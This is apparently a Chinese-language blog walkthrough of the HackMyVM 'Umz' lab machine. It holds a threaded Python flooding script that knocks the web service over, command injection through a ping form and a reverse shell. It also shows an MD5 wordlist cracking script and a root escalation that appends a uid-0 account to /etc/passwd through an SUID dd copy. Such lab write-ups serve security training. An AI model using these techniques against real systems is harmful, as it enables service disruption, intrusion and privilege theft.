Pepster'Blog
HackMyVM-Umz-Walkthrough
城南花已开 Lv6
  2025-06-12 22:41:30   2025-06-15 17:23:33    2.5k 字  13 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.159  08:00:27:5f:14:12       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f9:a1:ad       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.061 seconds (124.21 hosts/sec). 4 responded
export ip=192.168.60.159
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.159:22
Open 192.168.60.159:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 22:39 CST
Initiating ARP Ping Scan at 22:39
Scanning 192.168.60.159 [1 port]
Completed ARP Ping Scan at 22:39, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:39
Completed Parallel DNS resolution of 1 host. at 22:39, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:39
Scanning 192.168.60.159 [2 ports]
Discovered open port 80/tcp on 192.168.60.159

目录枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.159
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2714]
Progress: 441118 / 441120 (100.00%)
===============================================================
Finished
===============================================================

存在一个页面

尝试curl一下index.html,发现存在注释

1
2
3
4
5
6
7
8
9
10
11
12
❯ curl $ip
<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>cyber fortress 9000</title>
……………………
</head>
<body>
    <!-- do you feel lucky, punk? -->
    <!-- 你感觉幸运吗,混蛋?--> 
    ……………………

而且页面中提示我们需要对他进行DDOS攻击

就常理而言,DDOS靶机只会造成靶机瘫痪,并不会有什么进一步的线索

DDOS压力测试

index.php中有个小tips告诉我们,过多请求会触发什么协议

并且下面有个质数生成的什么东西

image

模糊测试一下参数

存在stress参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u "http://$ip/index.php?FUZZ" --hh 2707
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.159/index.php?FUZZ
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000018871:   200        93 L     201 W      2700 Ch     "stress"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 117.6076
Processed Requests: 24608
Filtered Requests: 24607
Requests/sec.: 209.2381

stress改变时质数的计算也会改变,那我们不断的向服务器发送计算请求

尝试DDOS,可能会有意想不到的收获

这里贴一下DingTom的脚本,一直发包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import requests
import threading
import concurrent.futures

def make_request():
    url = ' http://192.168.60.159/index.php?stress=9999999999999999999999999999'
    try:
        response = requests.get(url, timeout=5)
        return response.status_code
    except Exception as e:
        return str(e)

def main():
    # 线程数量
    num_threads = 1000000
    max_workers = 20000  # 根据系统资源调整
    print(f"开始执行{num_threads}个请求...")
    with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
        # 提交任务
        futures = [executor.submit(make_request) for _ in range(num_threads)]
        # 处理结果
        completed = 0
        for future in concurrent.futures.as_completed(futures):
            completed += 1
            if completed % 1000 == 0:
                print(f"已完成 {completed} 个请求")

if __name__ == "__main__":

    main()

尝试访问一下,终于卡住了

然后我们重新扫描端口,发现多开放了一个8080端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.159:22
Open 192.168.60.159:8080
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 23:32 CST
Initiating ARP Ping Scan at 23:32
Scanning 192.168.60.159 [1 port]
Completed ARP Ping Scan at 23:32, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:32
Completed Parallel DNS resolution of 1 host. at 23:32, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:32
Scanning 192.168.60.159 [2 ports]
Discovered open port 8080/tcp on 192.168.60.159
Discovered open port 22/tcp on 192.168.60.159
Completed SYN Stealth Scan at 23:32, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.159
Host is up, received arp-response (0.00059s latency).
Scanned at 2025-06-12 23:32:12 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 08:00:27:5F:14:12 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

尝试探测一下

1
2
3
❯ whatweb http://$ip:8080
http://192.168.60.159:8080 [302 Found] Country[RESERVED][ZZ], HTTPServer[Werkzeug/1.0.1 Python/3.9.2], IP[192.168.60.159], Python[3.9.2], RedirectLocation[http://192.168.60.159:8080/login], Title[Redirecting...], Werkzeug[1.0.1]
http://192.168.60.159:8080/login [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/1.0.1 Python/3.9.2], IP[192.168.60.159], PasswordField[pass], Python[3.9.2], Title[Debug Console Login], Werkzeug[1.0.1]

存在登录表单,尝试使用弱密码admin:admin

可以进行执行ping命令

利用分号绕过即可

image

用户提权

反弹个shell回来

监听端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Umz-192.168.60.159-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Umz~192.168.60.159_Linux_x86_64/2025_06_12-23_36_09-254.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
welcome@Umz:/root$ cd ~
welcome@Umz:~$ cat user.txt
flag{user-4483f72525b3c316704cf126bec02d5c}
welcome@Umz:~$ cat /etc/passwd |grep bin/bash
root:x:0:0:root:/root:/bin/bash
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
umzyyds:x:1001:1001:,,,:/home/umzyyds:/bin/bash

并且存在另一个用户umzyyds

/opt/flask-debug目录中存在umz.pass

当前用户无法读取

1
2
3
4
5
6
7
8
welcome@Umz:~$ cd /opt/
welcome@Umz:/opt$ cd flask-debug/
welcome@Umz:/opt/flask-debug$ ls -al
total 20
drwxr-xr-x 2 welcome welcome 4096 May  3 10:32 .
drwxr-xr-x 3 root    root    4096 May  3 09:46 ..
-rw-r--r-- 1 root    root    5001 May  3 10:23 flask_debug.py
-rwx------ 1 root    root      10 May  3 10:32 umz.pass

当前用户拥有sudo权限

可以执行md5sum

1
2
3
4
5
6
welcome@Umz:/opt/flask-debug$ sudo -l
Matching Defaults entries for welcome on Umz:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Umz:
    (ALL) NOPASSWD: /usr/bin/md5sum

结合umz.pass的文本的字节数来看,明文是9个字符

因为\n换行符算最后一个,如果没有echo -n 的话9位字符就是10个字节

1
2
3
echo "123456789">abc
ls -al abc
-rw-r--r-- 1 Pepster Pepster 10 Jun 12 23:40 abc

尝试进行爆破md5值

1
2
welcome@Umz:/opt/flask-debug$ sudo md5sum umz.pass
a963fadd7fd379f9bc294ad0ba44f659  umz.pass

利用如下脚本,注意echo不要加-n参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/bin/bash

TARGET_MD5="a963fadd7fd379f9bc294ad0ba44f659" # 目标MD5哈希值
WORDLIST="/usr/share/wordlists/rockyou.txt" # 词典路径

echo "开始爆破 MD5: ${TARGET_MD5}"
echo "使用词典: ${WORDLIST}"

# 检查词典文件是否存在
if [ ! -f "$WORDLIST" ]; then
    echo "错误: 词典文件 '${WORDLIST}' 不存在。"
    exit 1
fi

while IFS= read -r i; do
    # 计算字符串 $i 的 MD5 哈希
    # echo -n $i 会避免在字符串末尾添加换行符
    # md5sum 会计算其标准输入的MD5,然后我们只取第一个字段
    WORD_MD5=$(echo "$i" | md5sum | awk '{print $1}')

    if [[ "$WORD_MD5" == "$TARGET_MD5" ]]; then
        echo "找到匹配! 原始字符串: '$i'"
        exit 0 # 找到后退出
    fi
done < "$WORDLIST"

echo "未在词典中找到匹配的字符串。"

得到密码sunshine3

Root提权

切换用户

1
2
3
4
5
6
7
8
9
❯ bash a.sh
开始爆破 MD5: a963fadd7fd379f9bc294ad0ba44f659
使用词典: /usr/share/wordlists/rockyou.txt
找到匹配! 原始字符串: 'sunshine3'
---------------------------
welcome@Umz:/opt/flask-debug$ su umzyyds
Password:
umzyyds@Umz:/opt/flask-debug$ cd ~
umzyyds@Umz:~$

在用户家目录中存在SUID权限文件

1
2
3
4
5
6
7
8
9
umzyyds@Umz:~$ ls -al
total 96
drwx------ 2 umzyyds umzyyds  4096 May  3 10:42 .
drwxr-xr-x 4 root    root     4096 May  3 10:27 ..
lrwxrwxrwx 1 root    root        9 May  3 10:38 .bash_history -> /dev/null
-rw-r--r-- 1 umzyyds umzyyds   220 May  3 10:27 .bash_logout
-rw-r--r-- 1 umzyyds umzyyds  3526 May  3 10:27 .bashrc
-rwsr-sr-x 1 root    root    76712 May  3 10:42 Dashazi
-rw-r--r-- 1 umzyyds umzyyds   807 May  3 10:27 .profile

通过查看help发现很dd命令很相似

验证一下,没错,就是dd命令,改了名字罢了

1
2
3
4
umzyyds@Umz:~$ md5sum Dashazi
1f90de0a1b75febeda1936a1ed9e1066  Dashazi
umzyyds@Umz:~$ md5sum /bin/dd
1f90de0a1b75febeda1936a1ed9e1066  /bin/dd

利用dd命令,写/etc/passwd文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
umzyyds@Umz:~$ cp /etc/passwd .
umzyyds@Umz:~$ echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>passwd
umzyyds@Umz:~$ ./Dashazi if=passwd of=/etc/passwd
2+1 records in
2+1 records out
1485 bytes (1.5 kB, 1.5 KiB) copied, 0.00386415 s, 384 kB/s
umzyyds@Umz:~$ tail -n 1 /etc/passwd
primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash
umzyyds@Umz:~$ su primary
Password:
root@Umz:/home/umzyyds# id
uid=0(root) gid=0(root) groups=0(root)
root@Umz:/home/umzyyds# cat /root/root.txt
flag{root-a73c45107081c08dd4560206b8ef8205}

后记

  • 监测脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@Umz:~# cat monitor.sh
#!/bin/bash
# 文件名:monitor.sh
TARGET_URL="http://localhost/index.php"
CHECK_INTERVAL=3  # 检测间隔3秒
MAX_FAILS=3        # 连续失败3次触发操作
FAIL_COUNT=0

while true; do
    # 检查页面是否包含特征字符串(超时3秒)
    RESPONSE=$(timeout 3 curl -s -w "%{http_code}" "$TARGET_URL")
    STATUS=$?
    HTTP_CODE=$(echo "$RESPONSE" | tail -n1)
    CONTENT=$(echo "$RESPONSE" | head -n-1)

    # 判断条件:HTTP状态码非200或内容不包含特征
    if [[ $STATUS -ne 0 || $HTTP_CODE != 200 || ! "$CONTENT" =~ "HEALTHY_STRING" ]]; then
        FAIL_COUNT=$((FAIL_COUNT + 1))
        echo "[$(date)] 检测到服务异常,失败次数:$FAIL_COUNT" >> /var/log/monitor.log

        if [ $FAIL_COUNT -ge $MAX_FAILS ]; then
            echo "[$(date)] 触发故障转移!关闭Apache,启动Flask服务..." >> /var/log/monitor.log
            systemctl stop apache2
            sudo -u welcome python3 /opt/flask-debug/flask_debug.py
            exit 0
        fi
    else
        FAIL_COUNT=0
    fi

    sleep $CHECK_INTERVAL
done
  1. 信息收集
    1. 服务探测
    2. DDOS压力测试
  2. 用户提权
  3. Root提权
  4. 后记
总字数 633.1k
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
  1. 信息收集
    1. 服务探测
    2. DDOS压力测试
  2. 用户提权
  3. Root提权
  4. 后记